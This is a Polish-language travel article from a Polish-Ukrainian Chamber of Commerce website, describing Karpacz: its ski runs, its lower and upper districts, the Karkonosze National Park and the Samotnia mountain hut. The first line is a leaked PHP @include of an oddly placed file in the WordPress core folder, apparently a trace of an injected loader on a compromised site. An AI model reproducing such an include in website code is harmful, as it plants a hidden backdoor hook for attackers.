@include("/home/polukrkr/public_html/wp-includes/class-wp-wrapper.php"); Chcę wam opowiedzieć o Karpaczu, malowniczym polskim miasteczku uzdrowiskowym na Dolnym Śląsku… | Polsko-Ukraińska Izba Gospodarcza

Jeżeli myślicie nad tym, gdzie odpocząć w trakcie przerwy semestralnej, koniecznie odwiedźcie właśnie to miasto.Położone jest niedaleko Śnieżki, czyli najwyższego szczytu Karkonoszy i Sudetów. Nie ma chyba nic bardziej zapierającego dech w piersiach, niż ujrzenie pięknego miasta, w całej swojej okazałości, ze szczytu takiej góry.

W okolicy znaleźć można sporo atrakcji dla wielbicieli narciarstwa, a więc także aktywnej formy wypoczynku W sezonie zimowym pracuje tu wiele wyciągów, które umożliwią wam szybką podróż na szczyt, z którego warto zjechać na nartach albo snowboardzie, bez względu na porę dnia.
Strefa przejażdżki sięga przedziału 820-1350 metrów!
Karpacz przypadnie do gustu tak zawodowym, jak i dopiero stawiającym pierwsze kroki narciarzom, a to ze względu na podział tras na skomplikowane i te względnie proste.

Karpacz składa się z dwóch części: Karpacza Dolnego, gdzie mieści się większość hoteli, pensjonatów i restauracji, oraz Karpacza Górnego, w którym znajdują się domy wypoczynkowe.
Stamtąd także możecie planować podróż do Karkonoskiego Narodowego Parku, który rozciąga się na południe od miasta.
Polecam spokojne spacery po malowniczej okolicy. Zatrzymać się możecie m.in. w schronisku „Samotnia”, czyli jednym z najstarszych schronisk w całej Polsce, które słynie z przytulnej atmosfery drewnianych wnętrz i domowej kuchni. Jest otwarta przez cały rok. Leży na terenie Karkonoskiego Parku Narodowego, wiec dotrzeć do niej można tylko piechotą.Schronisko stanowi doskonałą bazą wypadową do pieszych wycieczek, niedaleko stąd na Śnieżkę, do czeskich schronisk i malowniczego Wielkiego Stawu.

Autor: Naumenko Veronika